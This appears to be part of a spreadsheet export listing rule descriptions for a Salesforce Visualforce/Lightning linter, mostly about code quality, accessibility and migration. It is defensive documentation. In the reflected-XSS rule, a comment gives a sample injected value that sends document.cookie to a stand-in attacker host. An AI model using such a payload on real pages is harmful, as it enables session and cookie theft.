    <t>&lt;p&gt;Because the &lt;code&gt;return&lt;/code&gt;, &lt;code&gt;throw&lt;/code&gt;, &lt;code&gt;break&lt;/code&gt;, and &lt;code&gt;continue&lt;/code&gt; statements unconditionally exit a block of code, any statements after them cannot be executed. Unreachable statements are usually a mistake.&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;function fn() {
    x = 1;
    return x;
    x = 3; // this will never execute
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule disallows unreachable code after &lt;code&gt;return&lt;/code&gt;, &lt;code&gt;throw&lt;/code&gt;, &lt;code&gt;continue&lt;/code&gt;, and &lt;code&gt;break&lt;/code&gt; statements.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-unreachable: "error"*/
function foo() {
    return true;
    console.log("done");
}
function bar() {
    throw new Error("Oops!");
    console.log("done");
}
while(value) {
    break;
    console.log("done");
}
throw new Error("Oops!");
console.log("done");
function baz() {
    if (Math.random() &amp;lt; 0.5) {
        return;
    } else {
        throw new Error();
    }
    console.log("done");
}
for (;;) {}
console.log("done");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule, because of JavaScript function and variable hoisting:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-unreachable: "error"*/
function foo() {
    return bar();
    function bar() {
        return 1;
    }
}
function bar() {
    return x;
    var x;
}
switch (foo) {
    case 1:
        break;
        var x;
}
&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:HotspotGetSessionIdUsage</t>
  </si>
  <si>
    <t>Using GETSESSIONID() and $API.Session_Id is security-sensitive</t>
  </si>
  <si>
    <t>The use of GETSESSIONID() and $API.Session_Id is security-sensitive. Ensure that you need to do this.
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/807"&gt;MITRE, CWE-807&lt;/a&gt; - Reliance on Untrusted Inputs in a Security Decision &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat3"&gt;SANS Top 25&lt;/a&gt; - Porous Defenses &lt;/li&gt;
  &lt;li&gt; OWASP Top 10 2021 Category A7 - Identification and Authentication Failures  &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>vf:CrossSiteScriptingReflected</t>
  </si>
  <si>
    <t>JavaScript Reflected XSS</t>
  </si>
  <si>
    <t>Reflected Cross-site Scripting (XSS) occur when an attacker injects browser executable code within a single HTTP response.&lt;br/&gt;
    	&lt;br/&gt;
    	&lt;h2&gt;See&lt;/h2&gt;
    	&lt;ul&gt;
    	  &lt;li&gt; &lt;a href="https://developer.salesforce.com/docs/atlas.en-us.pages.meta/pages/pages_security_tips_xss.htm"&gt;Cross Site Scripting (XSS)&lt;/a&gt;&lt;/li&gt;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&lt;script&gt;var foo = '{!$CurrentPage.parameters.userparam}';&lt;/script&gt;    //Bad: Javascript does not have built in protections.
// If userparam was given the value "1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo='2"
// all of the cookies for the current page would be sent to www.attacker.com.
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:UnencodedStyle</t>
  </si>
  <si>
    <t>Unencoded Formulas In Style Tags XSS</t>
  </si>
  <si>
    <t>Makes sure that all values obtained from URL parameters are properly escaped / sanitized to avoid XSS attacks.&lt;br/&gt;
Input can be sanitized with JSENCODE().&lt;br/&gt;
&lt;br/&gt;
Using unescaped parameters can be a security risk.
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://developer.salesforce.com/docs/atlas.en-us.pages.meta/pages/pages_security_tips_scontrols.htm"&gt;Unescaped Output and Formulas in Visualforce Pages&lt;/a&gt;&lt;/li&gt;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&amp;lt;style&amp;gt;
	  .xyz {
	    color: #{!$CurrentPage.parameters.userInput}; //Bad: This is vulnerable to XSS.
	  }
&amp;lt;/style&amp;gt;
&amp;lt;style&amp;gt;
	  .xyz {
	    color: #{!JSENCODE($CurrentPage.parameters.userInput)}; //Good: This is encoded with JSENCODE.
	  }
&amp;lt;/style&amp;gt;
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:AvoidExternalResources</t>
  </si>
  <si>
    <t>External Script and Style Resources Should Be Avoided</t>
  </si>
  <si>
    <t>Including content from untrusted sources can lead to various security issues including include injection of malware,
		information exposure by granting excessive privileges or permissions to the untrusted functionality, DOM-based XSS vulnerabilities, stealing user's cookies, or open redirect to malware.&lt;BR/&gt;
		&lt;BR/&gt;
		All script and style resources must be loaded via static resources.&lt;BR/&gt;
		Do not load these resources via script tags or links. &lt;BR/&gt;
&lt;h2&gt;See&lt;/h2&gt;		
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/829"&gt;MITRE, CWE-829&lt;/a&gt; - Inclusion of Functionality from Untrusted Control Sphere &lt;/li&gt;
  &lt;li&gt; OWASP Top 10 2021 Category A3 - Injection &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat2"&gt;SANS Top 25&lt;/a&gt; - Risky Resource Management &lt;/li&gt;
&lt;/ul&gt;
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
&amp;lt;aura:component&amp;gt;
  &amp;lt;ltng:require 
    styles="https://blah.com/css"    //Bad: This is not recommended.
    scripts="{!$Resource.example_js}"  //Good: Uses a static resource.
    afterScriptsLoaded="{!c.scriptsLoaded}" /&amp;gt;
&amp;lt;/aura:component&amp;gt;
&amp;lt;apex:page&amp;gt;
  &amp;lt;apex:includeScript value="http://risky.com/steal-your-data.js"/&amp;gt; //Bad: This is not recommended.
  &amp;lt;apex:stylesheet value="http://good.good.styles.com/css" /&amp;gt;  //Bad: This is not recommended.
  &amp;lt;apex:includeScript value="{!$Resource.example_js}"/&amp;gt;    //Good: Uses a static resource.
  &amp;lt;apex:stylesheet value="{!$Resource.customCSS}" /&amp;gt;      //Good: Uses a static resource.
&amp;lt;/apex:page&amp;gt;
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:secure-document</t>
  </si>
  <si>
    <t>validate document global access</t>
  </si>
  <si>
    <t>&lt;p&gt;This rule makes sure that only supported properties and functions are used to access the document global.&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;When the rule is enabled, unsupported calls or API objects are disallowed.  Your Lightning components are permitted to use:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Standard Lightning Component Framework features.&lt;/li&gt;
&lt;li&gt;Standard Javascript features.&lt;/li&gt;
&lt;li&gt;Standard Locker Service SecureObject object features. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;All disallowed uses are shown in red on this &lt;a href="http://documentation.auraframework.org/lockerApiTest/index.app?aura.mode=DEV"&gt;Document vs SecureDocument Compatibility Table&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;var curScriptElement = document.currentScript; //Using document.currentScript is disallowed.
&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-extend-native</t>
  </si>
  <si>
    <t>disallow extending native types</t>
  </si>
  <si>
    <t>&lt;p&gt;In JavaScript, you can extend any object, including builtin or "native" objects. Sometimes people change the behavior of these native objects in ways that break the assumptions made about them in other parts of the code.&lt;/p&gt;
&lt;p&gt;For example here we are overriding a builtin method that will then affect all Objects, even other builtins.&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;// seems harmless
Object.prototype.extra = 55;
// loop through some userIds
var users = {
    "123": "Stan",
    "456": "David"
};
// not what you'd expect
for (var id in users) {
    console.log(id); // "123", "456", "extra"
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;A common suggestion to avoid this problem would be to wrap the inside of the &lt;code&gt;for&lt;/code&gt; loop with &lt;code&gt;users.hasOwnProperty(id)&lt;/code&gt;. However, if this rule is strictly enforced throughout your codebase you won't need to take that step.&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;Disallows directly modifying the prototype of builtin objects.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-extend-native: "error"*/
Object.prototype.a = "a";
Object.defineProperty(Array.prototype, "times", { value: 999 });
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="options"&gt;Options&lt;/h2&gt;
&lt;p&gt;This rule accepts an &lt;code&gt;exceptions&lt;/code&gt; option, which can be used to specify a list of builtins for which extensions will be allowed.&lt;/p&gt;
&lt;h3 id="exceptions"&gt;exceptions&lt;/h3&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the sample &lt;code&gt;{ "exceptions": ["Object"] }&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-extend-native: ["error", { "exceptions": ["Object"] }]*/
Object.prototype.a = "a";
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="knownlimitations"&gt;Known Limitations&lt;/h2&gt;
&lt;p&gt;This rule &lt;em&gt;does not&lt;/em&gt; report any of the following less obvious approaches to modify the prototype of builtin objects:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;var x = Object;
x.prototype.thing = a;
eval("Array.prototype.forEach = 'muhahaha'");
with(Array) {
    prototype.thing = 'thing';
};
window.Function.prototype.bind = 'tight';
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;
&lt;p&gt;You may want to disable this rule when working with polyfills that try to patch older versions of JavaScript with the latest spec, such as those that might &lt;code&gt;Function.prototype.bind&lt;/code&gt; or &lt;code&gt;Array.prototype.forEach&lt;/code&gt; in a future-friendly way.&lt;/p&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-catch-shadow</t>
  </si>
  <si>
    <t>disallow `catch` clause parameters from shadowing variables in the outer scope</t>
  </si>
  <si>
    <t>&lt;p&gt;In IE 8 and earlier, the catch clause parameter can overwrite the value of a variable in the outer scope, if that variable has the same name as the catch clause parameter.&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;var err = "x";
try {
    throw "problem";
} catch (err) {
}
console.log(err)    // err is 'problem', not 'x'
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule is aimed at preventing unexpected behavior in your program that may arise from a bug in IE 8 and earlier, in which the catch clause parameter can leak into outer scopes. This rule will warn whenever it encounters a catch clause parameter that has the same name as a variable in an outer scope.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-catch-shadow: "error"*/
var err = "x";
try {
    throw "problem";
} catch (err) {
}
function err() {
    // ...
};
try {
    throw "problem";
} catch (err) {
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-catch-shadow: "error"*/
var err = "x";
try {
    throw "problem";
} catch (e) {
}
function err() {
    // ...
};
try {
    throw "problem";
} catch (e) {
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;
&lt;p&gt;If you do not need to support IE 8 and earlier, you should turn this rule off.&lt;/p&gt;</t>
  </si>
  <si>
    <t>vf:BoldTagsCheck</t>
  </si>
  <si>
    <t>"strong" Tags Should Be Used Instead of "b"</t>
  </si>
  <si>
    <t>&lt;p&gt;
The &amp;lt;strong&amp;gt;/&amp;lt;b&amp;gt; tags have exactly the same effect in most web browsers, but there is a fundamental difference between them: &amp;lt;strong&amp;gt; has a semantic meaning whereas &amp;lt;b&amp;gt; only conveys styling information like CSS.
&lt;/p&gt;
&lt;p&gt;
When &amp;lt;b&amp;gt; can have simply no effect on a Palm device with limited display or when a screen reader software is used by a blind person, &amp;lt;strong&amp;gt; will:
&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Underline the characters on a Palm Pilot&lt;/li&gt;
  &lt;li&gt;Speak with lower tone when using a screen reader such as Jaws&lt;/li&gt;
  &lt;li&gt;And display the text bold in normal browsers&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Consequently:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;in order to convey semantics, the &amp;lt;b&amp;gt; tags shall never be used,&lt;/li&gt;
  &lt;li&gt;in order to convey styling information, the &amp;lt;b&amp;gt; should be avoided and CSS should be used instead.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
&amp;lt;i&amp;gt;car&amp;lt;/i&amp;gt;                 //Bad: this is not recommended.
&amp;lt;b&amp;gt;train&amp;lt;/b&amp;gt;               //Bad: this is not recommended.
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
&amp;lt;em&amp;gt;car&amp;lt;/em&amp;gt;               //Good: this is preferred.
&amp;lt;strong&amp;gt;train&amp;lt;/strong&amp;gt;     //Good: this is preferred.
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:InlineStyleAttributesCheck</t>
  </si>
  <si>
    <t>Avoid Inline CSS Style Attributes</t>
  </si>
  <si>
    <t>&lt;p&gt;
This rule detects the usage of HTML "style" attributes to make sure that all CSS styles are defined in CSS classes.
&lt;/p&gt;
     &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
 &amp;lt;p style="color: blue;" &amp;gt; //Bad: using inline style attributes is not recommended.
 	//content...
 &amp;lt;/p&amp;gt;
     &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:LightningEnhancedListCheck</t>
  </si>
  <si>
    <t>Check for Lightning Migration Issues for apex:enhancedList</t>
  </si>
  <si>
    <t>This rule looks for apex:enhancedList usage which may no longer work in lightning.
apex:enhancedList isn't supported in Lightning Experience.
We recommend avoiding &lt;apex:enhancedList&gt; in Lightning Experience.
See &lt;a href="https://resources.docs.salesforce.com/198/latest/en-us/sfdc/pdf/lex_considerations.pdf"&gt;https://resources.docs.salesforce.com/198/latest/en-us/sfdc/pdf/lex_considerations.pdf&lt;/a&gt;
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
&amp;lt;apex:page&amp;gt;
	&amp;lt;apex:enhancedList&amp;gt;&amp;lt;/apex:enhancedList&amp;gt; //Bad: not recommended.
&amp;lt;/apex:page&amp;gt;
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:RequireConfirmationToken</t>
  </si>
  <si>
    <t>Require CSRF Protection On GET Requests</t>
  </si>
  <si>
    <t>Require CSRF protection on GET requests must be enabled from the Visual Force Page settings.&lt;br/&gt;
&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/352.html"&gt;MITRE, CWE-352&lt;/a&gt; - Cross-Site Request Forgery (CSRF) &lt;/li&gt;
  &lt;li&gt; OWASP Top 10 2017 Category A6 - Security Misconfiguration &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29"&gt;OWASP: Cross-Site Request Forgery&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat1"&gt;SANS Top 25&lt;/a&gt; - Insecure Interaction Between Components &lt;/li&gt;
  &lt;li&gt; Derived from FindSecBugs rule &lt;a href="https://find-sec-bugs.github.io/bugs.htm#SPRING_CSRF_PROTECTION_DISABLED"&gt;SPRING_CSRF_PROTECTION_DISABLED&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://trailhead.salesforce.com/en/content/learn/modules/secdev_application_logic_vulnerabilities/secdev_app_logic_csrf"&gt;Salesforce Trailhead: Prevent Cross-Site Request Forgery (CSRF)&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;
  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;//This setting must be enabled while creating a Visualforce page in Setup. &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:LightningAvoidHardcodedSalesforceDomain</t>
  </si>
  <si>
    <t>Check for Lightning Migration Issues for Salesforce.com and Force.com Links</t>
  </si>
  <si>
    <t>URL references might not work as expected if you decide to swap to My Domain or in Lightning Experience. 
If you decide to use My Domain, you have to replace hard-coded references to your original URL with references to your new domain.
Using something lie {! $Site.Domain } may work better. 
See &lt;a href="https://resources.docs.salesforce.com/198/latest/en-us/sfdc/pdf/lex_considerations.pdf"&gt;https://resources.docs.salesforce.com/198/latest/en-us/sfdc/pdf/lex_considerations.pdf&lt;/a&gt;
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
&lt;apex:page&gt;
	&lt;a href="https://na1.salesforce.com/..."&gt;link&lt;/a&gt; //Bad: This is not recommended.
	&lt;a href="https://{! $Site.Domain }/..."&gt;link&lt;/a&gt; //Good: This is preferred.
&lt;/apex:page&gt;
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:AvoidHardCodedResourceReferences</t>
  </si>
  <si>
    <t>Avoid Hard Coded Resource References</t>
  </si>
  <si>
    <t>This rule identifies files that have been referenced with a hard-coded path.  Best practise is to upload the files as a Static Resource.  
  This allows referencing with $Resource.&amp;lt;resource_name&amp;gt;.  
  More information on Static resources is available here: &lt;a href="https://developer.salesforce.com/docs/atlas.en-us.pages.meta/pages/pages_resources.htm"&gt;Using Static Resources&lt;/a&gt;
  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
	&amp;lt;apex:page&amp;gt;
		&amp;lt;apex:image url="/resource/TestImage.png" /&amp;gt;   	//Bad: Path is hard-coded.
		&amp;lt;apex:image url="{!$Resource.TestImage}" /&amp;gt;		//Good: Static Resource referencing is used.
	&amp;lt;/apex:page&amp;gt;
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:ImgWithoutWidthOrHeightCheck</t>
  </si>
  <si>
    <t>Images Tags Should Always Have a "width" and a "height" Attribute</t>
  </si>
  <si>
    <t>If the &lt;code&gt;width&lt;/code&gt; and &lt;code&gt;height&lt;/code&gt; attributes are set, the space required for the image is reserved immediately by the browser, even before it actually starts to load the image.
Without those attributes, the page layout constantly changes as images are loaded until they are all loaded, which can disorient users.
&lt;p&gt;The following code:&lt;/p&gt;
&lt;pre&gt;
&amp;lt;img src="logo.png" alt="My Company" /&amp;gt;                           //Bad: this is not recommended.
&lt;/pre&gt;
should be refactored into:
&lt;pre&gt;
&amp;lt;img src="logo.png" alt="My Company" width="100" height="50" /&amp;gt;   //Good: this is preferred.
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:AvoidDotNamespace</t>
  </si>
  <si>
    <t>Avoid Using Dot Namespace</t>
  </si>
  <si>
    <t>Avoid using apex. Component notation for namespaces.
   &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
	&amp;lt;aura:application&amp;gt;
	  &amp;lt;c.Lash_DemoLighting&amp;gt;&amp;lt;/c.Lash_DemoLighting&amp;gt;   //Bad: This syntax is not recommended.
	  &amp;lt;c:Lash_DemoLighting/&amp;gt;	//Good: This syntax is preferred.
	&amp;lt;aura:application&amp;gt;
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:AvoidMultipleForms</t>
  </si>
  <si>
    <t>Avoid Multiple Forms</t>
  </si>
  <si>
    <t>Multiple forms increase a page's view state and is not recommended
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
&amp;lt;apex:page&amp;gt;
  &amp;lt;apex:form&amp;gt;
  &amp;lt;/apex:form&amp;gt;
  &amp;lt;apex:form&amp;gt; 	//Bad: page should only have a single apex:form
  &amp;lt;/apex:form&amp;gt;
&amp;lt;/apex:page&amp;gt;
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:UnsupportedTagsInHtml5Check</t>
  </si>
  <si>
    <t>Tags No Longer Supported in HTML5 Should Not Be Used</t>
  </si>
  <si>
    <t>&amp;lt;p&amp;gt;
The following tags are no longer supported in HTML5 and should not be used:
&amp;lt;/p&amp;gt;
&amp;lt;ul&amp;gt;
  &amp;lt;li&amp;gt;&amp;amp;lt;acronym&amp;amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;amp;lt;applet&amp;amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;amp;lt;basefont&amp;amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;amp;lt;big&amp;amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;amp;lt;center&amp;amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;amp;lt;dir&amp;amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;amp;lt;font&amp;amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;amp;lt;frame&amp;amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;amp;lt;frameset&amp;amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;amp;lt;isindex&amp;amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;amp;lt;noframes&amp;amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;amp;lt;strike&amp;amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;amp;lt;tt&amp;amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
More information on deprecated tags is avaliable here - &lt;a href="https://www.tutorialspoint.com/html5/html5_deprecated_tags.htm"&gt;https://www.tutorialspoint.com/html5/html5_deprecated_tags.htm&lt;/a&gt;
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
 &amp;lt;apex:page&amp;gt;
  &amp;lt;html&amp;gt;
    &amp;lt;p&amp;gt&amp;lt;big&amp;gt;This is big text&amp;lt;/big&amp;gt;&amp;lt;/p&amp;gt   //Bad: This is deprecated.
    &amp;lt;p id="bigger"&amp;gt;This is big text&amp;lt;/p&amp;gt;           //Good: The size of the text should now be specified in CSS.
  &amp;lt;/html&amp;gt;
&amp;lt;/apex:page&amp;gt;
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:AvoidHtmlCommentCheck</t>
  </si>
  <si>
    <t>Avoid HTML Comments</t>
  </si>
  <si>
    <t>Checks for occurrence of HTML comments on server side pages.&lt;br/&gt;
HTML comments can be seen by the end user. Comments left behind by developers could include information that helps attackers.
&lt;br/&gt;
Salesforce doesn't display normal comments, but conditional comments are visible. See &lt;a href="https://developer.salesforce.com/docs/atlas.en-us.pages.meta/pages/pages_html_features_ie_conditional_comments.htm"&gt;HTML Comments and IE Conditional Comments&lt;/a&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/615.html"&gt;MITRE, CWE-615&lt;/a&gt; - Information Exposure Through Comments &lt;/li&gt;
  &lt;li&gt; OWASP Top 10 2017 Category A3 - Sensitive Data Exposure &lt;/li&gt;
&lt;/ul&gt;
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
&amp;lt;!-- 
This is a header comment and can be ignored.
--&amp;gt;
&amp;lt;apex:page&amp;gt;
	//Page content.
	&amp;lt;!-- Comment --&amp;gt;  	//Bad: Consider removing this comment.
&amp;lt;/apex:page&amp;gt;
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:ImgWithoutAltCheck</t>
  </si>
  <si>
    <t>Images Tags Should Have an "alt" Attribute</t>
  </si>
  <si>
    <t>&lt;p&gt;
The &lt;code&gt;alt&lt;/code&gt; attribute provides a textual alternative to an image.
It is used whenever the actual image cannot be rendered.
Common reasons for that include:
&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;The image can no longer be found&lt;/li&gt;
  &lt;li&gt;Slow internet connections, while waiting for the image to download&lt;/li&gt;
  &lt;li&gt;Visually impaired users using a screen reader software&lt;/li&gt;
  &lt;li&gt;Images loading is disabled, e.g. to reduce data consumption on mobile phones&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The following code illustrates this rule:&lt;/p&gt;
&lt;pre&gt;
&amp;lt;img src="foo.png" /&amp;gt;                                           //Bad: this is not recommended.
&amp;lt;img src="foo.png" alt="Some textual description of foo.png" /&amp;gt; //Good: this is preferred.</t>
  </si>
  <si>
    <t>vf:InlineStyleCheck</t>
  </si>
  <si>
    <t>Avoid Inline CSS Styles</t>
  </si>
  <si>
    <t>The goal of this rule is to ban the usage of HTML "style" property to make sure that all CSS styles are defined in CSS classes.
&amp;lt;style&amp;gt; tags can also be a weak point for HTML injection.
"For &amp;lt;style&amp;gt; tags the CDATA (HTML 4) or raw text (HTML 5) context applies. In this mode, the parser
searches for the closing script or style tag, and dispatches the contents of the string between these tags to the javascript or
CSS parser. No HTML decoding occurs. This is because the HTML parser does not understand javascript or CSS; its parsing role is
limited to determining the length of the string to pass to the JS or CSS parser."
More information at: &lt;a href="https://developer.salesforce.com/page/Secure_Coding_Cross_Site_Scripting"&gt;https://developer.salesforce.com/page/Secure_Coding_Cross_Site_Scripting&lt;/a&gt;
     &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
 &amp;lt;style&amp;gt; //Bad: using the inline style property is not recommended.
 	//content...
 &amp;lt;/style&amp;gt;
     &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:NonConsecutiveHeadingCheck</t>
  </si>
  <si>
    <t>Avoid Non Consecutive Heading Tags</t>
  </si>
  <si>
    <t>&lt;p&gt;
Heading tags are used by search engines and screen reader softwares to construct an outline of the page.
Starting at &lt;code&gt;&amp;lt;h1&amp;gt;&lt;/code&gt; and not skipping any level eases this automatic construction.
&lt;/p&gt;
&lt;p&gt;The following code:&lt;/p&gt;
&lt;pre&gt;
&amp;lt;h2&amp;gt;My Title&amp;lt;/h2&amp;gt;     //Bad: h1 is not being used before h2.
&amp;lt;h3&amp;gt;My Sub Title&amp;lt;/h3&amp;gt; //Good: h3 is being used after h2.
&lt;/pre&gt;
&lt;p&gt;should be refactored into:&lt;/p&gt;
&lt;pre&gt;
&amp;lt;h1&amp;gt;My Title&amp;lt;/h1&amp;gt;     //Good.
&amp;lt;h2&amp;gt;My Sub Title&amp;lt;/h2&amp;gt; //Good.
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:MaxLineLengthCheck</t>
  </si>
  <si>
    <t>Avoid Long Lines</t>
  </si>
  <si>
    <t>Having to scroll horizontally makes it harder to get a quick overview and understanding of any piece of code.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
 &amp;lt;apex:page&amp;gt;
  &amp;lt;html&amp;gt;
    &amp;lt;div class='foo'&amp;gt;       //Bad: The line below is much too long. Consider breaking it up over multiple lines. 
      &amp;lt;p&amp;gt;This may be a description on a page, html text or an element with a lot of attributes but having to scroll to the right a long way to find out what is going on is the worst&amp;lt;/p&amp;gt; 
    &amp;lt;/div&amp;gt;
  &amp;lt;/html&amp;gt;
&amp;lt;/apex:page&amp;gt;
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:AvoidHardCodedPageLink</t>
  </si>
  <si>
    <t>Avoid Hard-Coded Page Links.</t>
  </si>
  <si>
    <t>Avoid hard-coded Page links, use correct page references.
  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
&amp;lt;apex:page&gt;
	&amp;lt;apex:outputLink value="/apex/otherpage.html"&gt;   //Bad: Hard-coded page link.
  		This is a link to another page.
  	&amp;lt;/apex:outputLink&gt;
  	&amp;lt;apex:outputLink value="{!$Page.otherPage}"&gt;  //Good: This is recommended.
  		This is a link to another page.
  	&amp;lt;/apex:outputLink&gt;
&amp;lt;/apex:page&gt;
  &lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:LightningPageCheck</t>
  </si>
  <si>
    <t>Check for Lightning Migration Issues for apex:page attributes</t>
  </si>
  <si>
    <t>This rule looks for apex:page attributes usage which may no longer work in lightning.
See &lt;a href="https://resources.docs.salesforce.com/198/latest/en-us/sfdc/pdf/lex_considerations.pdf"&gt;https://resources.docs.salesforce.com/198/latest/en-us/sfdc/pdf/lex_considerations.pdf&lt;/a&gt;
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
&amp;lt;apex:page showheader='false' sidebar='false' title='not supported'&amp;gt; //Bad: not recommended.
&amp;lt;/apex:page&amp;gt;
    &lt;/pre&gt;</t>
  </si>
